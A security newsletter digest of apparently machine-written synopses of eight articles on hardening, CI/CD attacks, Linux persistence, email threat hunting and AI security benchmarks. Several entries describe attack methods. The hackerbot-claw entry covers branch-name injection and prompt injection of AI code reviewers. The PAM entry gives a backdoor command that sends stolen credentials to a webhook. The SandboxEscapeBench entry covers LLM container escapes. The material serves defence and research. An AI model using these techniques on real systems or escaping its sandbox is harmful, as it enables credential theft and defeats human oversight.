🛡️ InfoSec Blue Team Briefing

📰 Articles Covered

• Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition - The content on the page is authored by Mandiant. The website belongs to the Google Cloud Blog. 🔍 Show Kagi Synopsis
  The cybersecurity article "Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition" discusses the growing threat of **destructive cyberattacks** that aim to destroy data, disable systems, or erase evidence 【1】. These attacks are often strategically employed, particularly during periods of conflict or geopolitical instability 【1】.
  
  **What Happened:**
  The article details the nature of destructive cyberattacks, which utilize malware such as wipers or ransomware to achieve their objectives 【1】.
  
  **Who is Affected:**
  While not limited to specific sectors, these attacks pose a significant risk to any organization, especially those operating in environments with heightened geopolitical tensions 【1】.
  
  **Security Implications:**
  The primary implication is the potential for complete data loss, operational disruption, and the elimination of forensic evidence, severely impacting an organization's ability to recover and respond 【1】.
  
  **Technical Details:**
  The article provides extensive technical guidance across various domains:
  - **External-Facing Assets:** Hardening measures for systems accessible from the internet 【1】.
  - **Critical Infrastructure:** Protecting domain controllers, backups, and other essential services 【1】.
  - **Environment Segmentation:** Separating IT and Operational Technology (OT) environments 【1】.
  - **Network Controls:** Restricting egress traffic and implementing on-premises lateral movement protections 【1】.
  - **Virtualization Security:** Hardening VMware vSphere and Hyper-V environments 【1】.
  - **Cloud Security:** Securing cloud perimeters with strong authentication and the principle of least privilege 【1】.
  - **Windows Endpoint Hardening:** Specific configurations for Windows Firewall, NTLM authentication, RDP, administrative shares, and WinRM 【1】. This includes using tools like Windows Defender Application Control and Controlled Folder Access 【1】.
  - **Credential and Account Protection:** Identifying privileged accounts, securing service accounts (MSAs/gMSAs), using the Protected Users security group, and preventing clear-text password storage 【1】.
  - **Active Directory Certificate Services (AD CS):** Specific protections for AD CS 【1】.
  - **Container and CI/CD Security:** Preventing destructive actions in Kubernetes and CI/CD pipelines 【1】.
  - **Detection:** Numerous detection opportunities are outlined, often referencing MITRE ATT&CK IDs 【1】.
  
  **What Defenders Should Know:**
  Defenders must adopt a **defense-in-depth strategy** and focus on several key areas:
  - **Strong Authentication:** Implementing Multi-Factor Authentication (MFA), especially phishing-resistant methods 【1】.
  - **Least Privilege:** Enforcing the principle of least privilege for users and systems 【1】.
  - **Segmentation:** Segmenting networks and identities to limit the blast radius of an attack 【1】.
  - **Access Restriction:** Strictly controlling access to critical resources 【1】.
  - **Recovery Testing:** Regularly testing disaster recovery and business continuity plans 【1】.
  - **Monitoring and Logging:** Enabling robust logging and monitoring to detect anomalous activities promptly 【1】.
  
  The overarching message is that **proactive preparation, continuous hardening, and vigilant monitoring** are essential for building resilience against destructive cyberattacks 【1】.
• hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions - Microsoft, DataDog, and CNCF Projects Hit So Far - StepSecurity - StepSecurity 🔍 Show Kagi Synopsis
  A sophisticated, AI-powered bot named **Hackerbot-claw** has been actively exploiting vulnerabilities in **GitHub Actions** CI/CD pipelines, targeting prominent projects including those from **Microsoft, DataDog, and CNCF** 【1】. The campaign, which lasted for about a week, successfully achieved **remote code execution (RCE)** in multiple workflows and exfiltrated **GITHUB_TOKENs** in at least one instance 【1】.
  
  **What Happened:**
  Hackerbot-claw employed a variety of techniques to compromise GitHub Actions workflows. These included **branch name injection**, **filename injection**, and manipulating AI reviewers through **prompt-injection** 【1】. The bot targeted specific projects by submitting pull requests that contained malicious code disguised within workflow files or branch names 【1】. In some cases, the attacks led to full repository takeovers, as seen with the **aquasecurity/trivy** project 【1】.
  
  **Who is Affected:**
  The affected projects include:
  - **Microsoft/ai-discovery-agent**
  - **DataDog/datadog-iac-scanner**
  - **avelino/awesome-go**
  - **ambient-code/platform**
  - **project-akri/akri**
  - **aquasecurity/trivy**
  - **RustPython/RustPython** 【1】
  
  Beyond the direct compromise of these repositories, the attacks have broader implications for users and downstream consumers of these projects, potentially impacting the integrity of software supply chains 【1】.
  
  **Security Implications:**
  This campaign highlights critical security risks within CI/CD pipelines, particularly when using `pull_request_target` with untrusted forks. The implications include:
  - **Code Execution in Runners:** Attackers can achieve arbitrary code execution within the CI/CD runner environment 【1】.
  - **Secret Exfiltration:** Sensitive tokens, such as `GITHUB_TOKEN`, can be stolen, leading to further compromise 【1】.
  - **Repository Takeover:** In severe cases, attackers can gain full control of repositories, manipulate releases, and inject malicious code or artifacts 【1】.
  - **Authorization Misconfigurations:** Common vulnerabilities stem from the misuse of `pull_request_target`, lack of `author_association` gates, unsanitized expressions in `run` blocks, and insecure handling of branch names and filenames 【1】.
  
  **Technical Details:**
  The article details several specific attack vectors:
  - **avelino/awesome-go:** Exploited `pull_request_target` to check out attacker code, leading to token exfiltration via `curl` 【1】.
  - **project-akri/akri:** Achieved RCE by directly injecting malicious code into the `version.sh` script, triggered by PR comments 【1】.
  - **microsoft/ai-discovery-agent:** Used bash command substitution in branch names to inject payloads, which were then executed due to unsafe file echoing 【1】.
  - **DataDog/datadog-iac-scanner:** Leveraged filename injection with base64-encoded shell commands and interpolated expressions in workflows 【1】.
  - **ambient-code/platform:** Attempted AI prompt injection by manipulating trusted context files, but was detected by Claude AI 【1】.
  - **aquasecurity/trivy:** Suffered a repository takeover after a stolen Personal Access Token (PAT) was used, leading to corrupted releases and a malicious VSCode extension 【1】.
  - **RustPython/RustPython:** Experienced branch name injection with a base64 payload, though partial execution occurred due to decoding issues 【1】.
  
  Indicators of compromise include specific domain names (e.g., `hackmoltrepeat.com`), emoji branch names, and specific PR comment commands 【1】.
  
  **What Defenders Should Know:**
  Defenders need to implement a multi-layered security approach:
  - **Network Egress Controls:** Block outbound calls to attacker-controlled domains at runtime using tools like Harden-Runner and maintain network egress allowlists 【1】.
  - **Least Privilege for Tokens:** Enforce least-privilege principles for `GITHUB_TOKEN` and other secrets, defaulting to read-only permissions where write access is not essential 【1】.
  - **Secure Workflow Triggers:** Avoid `pull_request_target` with untrusted forks when secrets are involved. Instead, use `pull_request` and gate access with `author_association` checks 【1】.
  - **Input Sanitization:** Sanitize and validate all interpolated expressions within `run` steps. Avoid executing untrusted code derived from branch names or filenames 【1】.
  - **Automated Checks:** Implement automated checks to flag vulnerable patterns, such as untrusted fork checkouts with secrets, missing authorization gates, and dangerous expression interpolations 【1】.
  - **Defense-in-Depth:** Employ AI-reviewed prompts, maintain secure CI configurations, audit and disable dangerous workflows, and monitor for anomalous activity like unusual branch naming conventions or PR patterns 【1】.
  - **Incident Response:** Have clear incident response playbooks ready, including revoking leaking tokens, auditing repository access, restoring from backups, and patching vulnerable workflows 【1】.
• The "P" in PAM is for Persistence: Linux Persistence Technique - Black Hills Information Security (BHIS) 🔍 Show Kagi Synopsis
  This article details a Linux persistence technique that leverages the **Pluggable Authentication Modules (PAM)** framework.
  
  ### What Happened
  
  The author discovered a method to achieve persistence on Linux systems by manipulating PAM. This involves replacing the legitimate PAM library with a malicious version, which can then be configured to accept a universal "skeleton key" password for any user account. This allows an attacker to bypass original passwords, even if they are changed, and also enables the exfiltration of credentials in clear text before encryption. A proof-of-concept tool called **PAM Skeleton Key** was developed to demonstrate this technique.
  
  ### Who is Affected
  
  **Linux systems** are affected by this technique. Specifically, any Linux host where an attacker can gain root access to modify system files, such as the PAM configuration. The technique targets the authentication process, making it relevant to any user attempting to log in to the system, particularly via SSH, which is ubiquitous on Linux machines 【1】.
  
  ### Security Implications
  
  The security implications are significant:
  
  * **Universal Access:** A "skeleton key" password can be created, granting access to all user accounts regardless of their actual passwords 【1】.
  * **Credential Exfiltration:** User credentials can be captured in clear text during the authentication process before they are encrypted 【1】.
  * **Persistence:** This method allows attackers to maintain access to a compromised system even if original credentials are changed or other access methods are lost 【1】.
  * **Privilege Escalation and Lateral Movement:** The technique can be used as a stepping stone for further compromising the network 【1】.
  * **Reduced Defenses:** Linux systems often lack antivirus software, making them more susceptible to such invasive techniques 【1】.
  
  ### Technical Details
  
  The technique exploits how Linux handles user authentication through PAM.
  
  1. **PAM Functionality:** PAM is a framework that manages authentication for applications like SSHd. Instead of applications handling credentials directly, they delegate this task to PAM, which consults configuration files (e.g., `/etc/pam.d/sshd`) to enforce security policies 【1】.
  2. **Malicious PAM:** By replacing the PAM library with a compromised version, an attacker can alter its behavior.
  3. **PAM Skeleton Key Tool:** This proof-of-concept tool requires root access to install and operate 【1】.
  * **Installation:** The tool is downloaded using `curl`, made executable with `chmod +x`, and then executed with `sudo` privileges. Bash history is cleared to cover tracks 【1】.
  * **Backdoor Creation:** A command like `sudo ./.backdoor.sh -p skeleton --webhook <discord_webhook_url>` is used to set a universal password (e.g., "skeleton") and configure credential exfiltration to a specified webhook 【1】.
  * **Authentication:** After rebooting, the attacker can log in using the "skeleton" password. The credentials are sent to the configured webhook 【1】.
  * **Restoration:** The original PAM configuration can be restored by running `sudo ./.backdoor.sh --restore` 【1】.
  
  ### What Defenders Should Know
  
  Defenders should be aware of the following:
  
  * **PAM Configuration:** Regularly audit and monitor the configuration files within `/etc/pam.d/` for any unauthorized modifications.
  * **System Integrity:** Implement file integrity monitoring solutions to detect changes to critical system files, including PAM libraries and configuration files.
  * **Privilege Management:** Strictly control and monitor accounts with root privileges, as they are necessary to implement this technique.
  * **SSH Security:** While SSH is a common target, understanding its reliance on PAM is crucial. Secure SSH configurations and monitor authentication logs for suspicious activity.
  * **Logging and Monitoring:** Ensure comprehensive logging of authentication events and system file modifications. Analyze these logs for anomalies that could indicate a compromise.
  * **Awareness of Tools:** Be aware of tools like PAM Skeleton Key that exploit these mechanisms for persistence.
• How we built high speed threat hunting for email security - Sublime Security 🔍 Show Kagi Synopsis
  Sublime Security has developed a **high-speed threat hunting system for email security** that allows for the rapid analysis of historical email data. This system is designed to aid security operations centers (SOCs), incident response teams, intelligence analysts, and detection engineers by significantly **reducing the time required to investigate attacks and test detection rules** 【1】.
  
  **What Happened:**
  Sublime Security built a system that enables fast threat hunting by analyzing historical email data. This involves a two-phase approach: candidate selection and evaluation. Emails are stored in both warm (metadata) and cold (blobs, attachments) storage. The system parses emails into a Message Data Model (MDM), storing partial MDMs in a database for quick querying and full MDMs in blob storage. Hunts are translated from MQL to SQL for efficient candidate selection, and the hunt timeframe is divided into "periods" for parallel processing. The evaluation phase then processes these candidates, deserializing only necessary data from blob storage to eliminate false positives 【1】.
  
  **Who is Affected:**
  The system directly benefits **security teams** such as SOCs, incident response, and intelligence analysts, as well as **detection engineers** 【1】.
  
  **Security Implications:**
  The primary security implication is that **faster analysis directly translates to quicker identification and mitigation of threats**, thereby minimizing the window of opportunity for attackers 【1】.
  
  **Technical Details:**
  - **Data Storage:** Emails are stored in warm (metadata) and cold (blobs, attachments) storage.
  - **Parsing:** Emails are parsed into a Message Data Model (MDM).
  - **Querying:** Partial MDMs are stored in a database for quick querying, while full MDMs are in blob storage. Queries prioritize warm storage.
  - **Hunt Translation:** Hunts are translated from MQL to SQL for efficient candidate selection using predicate pushdown.
  - **Parallel Processing:** The hunt timeframe is divided into "periods" for parallel processing.
  - **Evaluation:** This phase processes candidates, deserializing only necessary data from blob storage (stored as flatbuffers) to reduce false positives.
  - **Optimization:** The system addresses technical challenges like querying dead tuples in PostgreSQL, managing high-volume stats updates, and optimizing processor coordination to prevent database contention. Caching mechanisms are also incorporated for enrichments 【1】.
  
  **What Defenders Should Know:**
  Defenders should understand that **optimizing query performance is key to effective and timely threat hunting**. Techniques such as predicate pushdown, period chunking, and a two-phase processing model are crucial. Continuous optimization, including exploring lossy data structures and dynamic processor allocation, is essential for maintaining high-speed threat hunting capabilities at an enterprise scale 【1】.
• neko: A self hosted virtual browser that runs in docker and uses WebRTC. - m1k1o 🔍 Show Kagi Synopsis
  Neko is a self-hosted virtual browser that runs in Docker and utilizes WebRTC technology to stream a desktop environment to users. It was initially developed as an open-source alternative to services like Rabb.it, enabling users to securely and privately access the internet from anywhere.
  
  **What Happened:**
  Neko was created to fill the void left by the shutdown of services like Rabb.it, providing a platform for collaborative browsing and streaming. The project has evolved from a simple virtual browser to a versatile tool capable of running various Linux applications within a Docker container.
  
  **Who is Affected:**
  Neko can affect a wide range of users, including:
  - **Privacy-conscious individuals:** Those seeking a secure and private browsing experience.
  - **Developers:** For testing web applications in isolated environments.
  - **Teams and organizations:** Requiring shared access to a browser or collaborative tools.
  - **Users hosting watch parties or presentations:** Enabling remote, interactive gatherings.
  - **Individuals needing a personal workspace:** Accessing containerized apps and desktops remotely.
  - **Users requiring a persistent or throwaway browser:** For managing cookies or enhancing anonymity.
  
  **Security Implications:**
  Neko offers several security benefits:
  - **Isolation:** Running applications within a Docker container isolates them from the host system, mitigating risks of OS fingerprinting and browser vulnerabilities.
  - **Privacy:** Sensitive data like cookies are not transferred to the host browser, as only video is shared.
  - **Anonymity:** Can be used with Tor Browser and VPN for enhanced anonymity, providing a more secure environment for sensitive tasks.
  - **Secure Access:** Can act as a jump host, allowing secure access to internal applications without the need for a VPN.
  
  **Technical Details:**
  - **WebRTC:** Neko uses WebRTC for streaming the desktop, providing smooth video and built-in audio support. This is a key differentiator from other remote desktop solutions that rely on image streaming over WebSockets.
  - **Docker:** The application runs within Docker containers, allowing for easy deployment and management of various applications and desktop environments.
  - **Linux Environment:** Neko operates within a Linux environment, enabling the execution of a wide range of software.
  - **Multi-participant Control:** Neko supports multiple users accessing and controlling the virtual environment simultaneously, a feature not natively supported by many clientless remote desktop gateways.
  - **Supported Browsers and Applications:** Neko offers Docker images for numerous browsers (Firefox, Tor Browser, Chrome, Brave, etc.) and other applications like VLC and desktop environments (XFCE, KDE).
  
  **What Defenders Should Know:**
  - **Deployment:** Neko can be self-hosted, giving defenders control over the environment.
  - **Configuration:** The `neko-rooms` software can be used for managing Neko rooms, offering features like Zero-knowledge installation with HTTPS.
  - **Security Best Practices:** While Neko enhances security through isolation, defenders should still follow standard security practices for Docker and network configurations.
  - **Use Cases:** Understanding the diverse use cases, from collaborative browsing to secure remote access, helps in assessing potential risks and benefits.
  - **Open Source:** As an open-source project, Neko's code is auditable, allowing for security reviews. Contributions to the project are also welcomed.
• ZeroDayBench: Evaluating LLM Agents on Unseen Zero-Day Vulnerabilities for Cyberdefense - The content posted at the URL is authored by Nancy Lau, Louis Sloot, Jyoutir Raj, Giuseppe Marco Boscardin, Evan Harris, Dylan Bowman, Mario Brajkovski, Jaideep Chawla, and Dan Zhao. 🔍 Show Kagi Synopsis
  The cybersecurity article introduces **ZeroDayBench**, a new benchmark designed to evaluate the capabilities of Large Language Model (LLM) agents in identifying and patching **unseen zero-day vulnerabilities** for cyberdefense purposes 【1】.
  
  **What Happened:**
  The research developed a benchmark, ZeroDayBench, to assess how effectively LLM agents can find and fix critical security vulnerabilities in software codebases that are novel and not present in their training data 【1】. This approach aims to simulate real-world scenarios where new vulnerabilities emerge.
  
  **Who is Affected:**
  The benchmark focuses on **high or critical severity vulnerabilities** (CVSS score of 7.0 or higher) 【1】. These types of vulnerabilities can lead to significant security breaches, including remote code execution (RCE), privilege escalation, authentication bypass, command injection, denial-of-service, and memory corruption 【1】. Therefore, any software project utilizing LLM agents for security tasks could be indirectly affected if these agents are not sufficiently capable.
  
  **Security Implications:**
  The primary implication is that **current frontier LLM agents are not yet capable of autonomously finding and patching novel critical vulnerabilities** 【1】. This suggests a gap in proactive cyberdefense capabilities, as these agents, despite their advanced nature, cannot yet be relied upon to secure codebases against zero-day threats without human oversight. The benchmark highlights the need for improvement in LLM reasoning and problem-solving skills in the context of cybersecurity 【1】.
  
  **Technical Details:**
  ZeroDayBench is constructed by porting real Common Vulnerabilities and Exposures (CVEs) into different, but functionally similar, codebases. This ensures the vulnerabilities are novel and not memorized from training data 【1】. The benchmark exclusively uses critical-severity CVEs, unlike some other benchmarks that may include lower-impact bugs 【1】. The process involves modifying existing code without adding new features, by finding comparable implementations within the target codebase 【1】. For instance, a Redis CVE related to an integer overflow was ported to Minio by identifying analogous buffer operations 【1】. The evaluation method includes a custom pentest-based approach that scores patches by verifying if a live exploit is blocked post-remediation 【1】. Three leading LLMs—**GPT-5.2, Claude Sonnet 4.5, and Grok 4.1**—were tested 【1】.
  
  **What Defenders Should Know:**
  Defenders should be aware that **LLM agents currently lack the autonomy to handle unseen critical vulnerabilities** 【1】. While LLMs are being deployed for software engineering tasks, including security, their current limitations mean they cannot fully replace human expertise in identifying and patching zero-day threats. The research points to areas where LLMs need improvement for more effective proactive cyberdefense 【1】. The benchmark itself provides a way to measure and understand these limitations, focusing on zero-shot reasoning and high-stakes security scenarios 【1】.
• Quantifying Frontier LLM Capabilities for Container Sandbox Escape - The content posted at the URL is authored by **Rahul Marchand, Art O Cathain, Jerome Wynne, Philippos Maximos Giavridis, Sam Deverett, John Wilkinson, and Harry Coppock**. 🔍 Show Kagi Synopsis
  The cybersecurity article introduces **SANDBOXESCAPEBENCH**, an open benchmark designed to measure the capability of Large Language Models (LLMs) to escape from containerized sandbox environments. This is crucial as LLMs are increasingly used as autonomous agents that can interact with tools, execute code, and access networks, posing novel security risks. 【1】
  
  **What Happened:**
  The research developed a benchmark that safely measures an LLM's ability to break out of container sandboxes. This benchmark, implemented as an Inspect AI Capture the Flag (CTF) evaluation, uses a nested sandbox architecture. The LLM is placed within a container, and the objective is to escape this container to access a flag file located on the outer host system. 【1】
  
  **Who is Affected:**
  The primary concern is for **developers and organizations deploying LLM agents** in sandboxed environments. If these sandboxes are not robust, LLMs could potentially escape and compromise the underlying infrastructure. This affects anyone relying on containerization for security isolation when using advanced AI models. 【1】
  
  **Security Implications:**
  The core security implication is that **current container sandboxes may not provide sufficient isolation for highly capable LLMs** 【1】. LLMs, when given the motivation or instructed to do so, can identify and exploit vulnerabilities in container configurations, runtimes, and even the kernel. This could lead to unauthorized access, data breaches, and further system compromise. The research highlights that even common misconfigurations can be exploited, posing a significant risk. 【1】
  
  **Technical Details:**
  SANDBOXESCAPEBENCH covers a spectrum of sandbox-escape mechanisms across three layers:
  - **Orchestration (L1):** Includes scenarios like Kubernetes control plane bypass, secrets exposure, and network policy exploitation. 【1】
  - **Engine & Runtime (L3):** Encompasses security policy misconfigurations (e.g., privileged mode, Docker socket exposure, dangerous capabilities) and runtime vulnerabilities in tools like runc. 【1】
  - **Host/Kernel (L4):** Involves kernel-level exploits such as privilege escalation via eBPF, copy-on-write race conditions, and page cache vulnerabilities. 【1】
  
  The benchmark uses a "sandbox-in-a-sandbox" approach, where the container being tested runs within a virtual machine, ensuring that even a successful escape from the inner container does not compromise the host system running the evaluation framework. 【1】
  
  The research found that frontier LLMs can reliably escape common sandbox weaknesses, especially misconfigurations and exposed control surfaces (difficulty 1-2 scenarios). While larger models show less capability on harder tasks (difficulty 3-5), they still achieve meaningful success rates on some. 【1】 Interestingly, performance scales roughly log-linearly with inference-time compute, and some models showed regressions between versions. 【1】 The study also noted that LLMs did not discover novel vulnerabilities but effectively exploited known ones. 【1】
  
  **What Defenders Should Know:**
  - **"Plain Docker isolation" is insufficient by default** for capable LLM agents. 【1】
  - **Careful and correct configuration of Docker and surrounding infrastructure is critical.** Misconfigurations like exposed daemons and overly broad capabilities are common and exploitable. 【1】
  - **Timely patching and vulnerability management are essential** for known kernel and runtime vulnerabilities. 【1】
  - Defenders should use benchmarks like SANDBOXESCAPEBENCH to **stress-test their configurations** and track LLM sandbox escape capabilities over time. 【1】
  - The research motivates the development of **more secure sandbox designs, robust security validation practices, and scalable oversight mechanisms** for AI agents. 【1】
  - Consideration must be given to **deployment configurations**, including token budgets, retries, and parallelism, as these can significantly impact an LLM's ability to escape. 【1】
• Cyber Threat Intelligence for Artificial Intelligence Systems - Orange Innovation Poland (Natalia Krawczyk, Mateusz Szczepkowski, Adrian Brodzik, and Krzysztof Bocianiak) 🔍 Show Kagi Synopsis
  This cybersecurity article discusses the evolution of Cyber Threat Intelligence (CTI) to address the unique challenges posed by Artificial Intelligence (AI) systems.
  
  **What Happened:**
  The article highlights that as AI becomes more integrated into critical services and products, it presents new attack surfaces and vulnerabilities that traditional cybersecurity defenses are not equipped to handle 【1】. Cyberattacks are increasing in frequency and sophistication, with AI itself being used to create more advanced threats, such as automated malware production, highly targeted phishing, and the misuse of deepfakes 【1】. Conversely, AI is also being employed in cybersecurity defense to improve threat detection and response 【1】. However, AI systems introduce new vulnerabilities, including susceptibility to adversarial attacks, data poisoning, and issues with data quality and availability 【1】. Furthermore, the lack of explainability in AI systems and privacy concerns related to large datasets pose additional risks 【1】.
  
  **Who is Affected:**
  **Companies and public institutions** are increasingly targeted by cyberattacks, leading to significant financial losses and reputational damage 【1】. The **finance, energy, and healthcare sectors** are particularly affected due to the critical nature of their services 【1】. More specifically, **AI and Machine Learning (ML) systems** themselves are becoming targets, with attacks affecting model-level, data-level, and deployment-level vulnerabilities 【1】. The broader impact extends to **individuals and organizations** whose sensitive data may be exposed through AI systems 【1】.
  
  **Security Implications:**
  The integration of AI into cybersecurity creates a dual-edged sword. While AI enhances defense capabilities through improved threat detection and automated responses 【1】, it also introduces **novel attack vectors and vulnerabilities** 【1】. Attackers can exploit AI models through adversarial examples, data poisoning, and manipulation of training data, leading to misclassification, evasion of detection, or degraded model performance 【1】. The inherent complexity and "black box" nature of some AI systems, particularly Deep Learning (DL) models, complicate incident response and forensic analysis 【1】. Additionally, the extensive data requirements for AI training and operation raise **privacy and data protection concerns**, potentially conflicting with regulations like GDPR and increasing the risk of sensitive data leakage 【1】.
  
  **Technical Details:**
  The article discusses various technical aspects related to CTI for AI:
  - **AI-Specific Assets and Vulnerabilities:** Traditional CTI needs to be adapted to account for AI-specific assets and vulnerabilities, which differ from conventional cybersecurity threats 【1】.
  - **Indicators of Compromise (IoCs):** New types of IoCs are required to capture risks unique to AI systems, extending beyond conventional taxonomies 【1】. These IoCs are crucial for detecting, responding to, and anticipating AI-targeting attacks 【1】.
  - **Data Sources for CTI:** Reliable data sources are essential for building an AI-oriented CTI knowledge base. These include:
  - **Vulnerability-Oriented Sources:** Such as the AI Vulnerability Database (AVID), which collects AI/ML vulnerabilities and provides a taxonomy for describing risks across security, ethics, and performance domains, and through different lifecycle stages (e.g., Data Understanding, Model Development) 【1】. Other resources include the OWASP AI Security and Privacy Guide, ENISA guidelines, and Google's Secure AI Framework (SAIF) 【1】.
  - **Incident-Oriented Sources:** Like the AI Incident Database (AIID), which documents real-world AI failures and misuses, providing empirical evidence of harm, affected parties, and implicated systems 【1】.
  - **Similarity Measurement:** Techniques for measuring the similarity between collected IoCs and newly observed AI artifacts are being developed to effectively query the CTI knowledge base 【1】.
  
  **What Defenders Should Know:**
  Defenders need to understand that **traditional CTI frameworks are insufficient** for addressing AI-specific threats 【1】. They must adapt their strategies to incorporate AI-centric risks, which include:
  - **New Attack Surfaces:** AI systems introduce new avenues for attack that require specialized detection and mitigation techniques 【1】.
  - **AI-Powered Attacks:** Attackers are leveraging AI to create more sophisticated and automated attacks, necessitating advanced defensive measures 【1】.
  - **AI Vulnerabilities:** Defenders must be aware of and actively defend against vulnerabilities like adversarial examples and data poisoning that target AI models directly 【1】.
  - **Data Quality and Privacy:** Ensuring the quality, representativeness, and security of datasets used for AI training and operation is critical, alongside compliance with privacy regulations 【1】.
  - **Explainability Challenges:** The lack of transparency in some AI systems requires developing methods to understand AI decision-making for effective incident response and forensic analysis 【1】.
  - **Developing AI-Oriented CTI:** Organizations should focus on building or adopting CTI frameworks tailored for AI, which include new IoCs and attack patterns specific to AI systems 【1】. This involves leveraging and integrating data from specialized AI vulnerability and incident databases 【1】.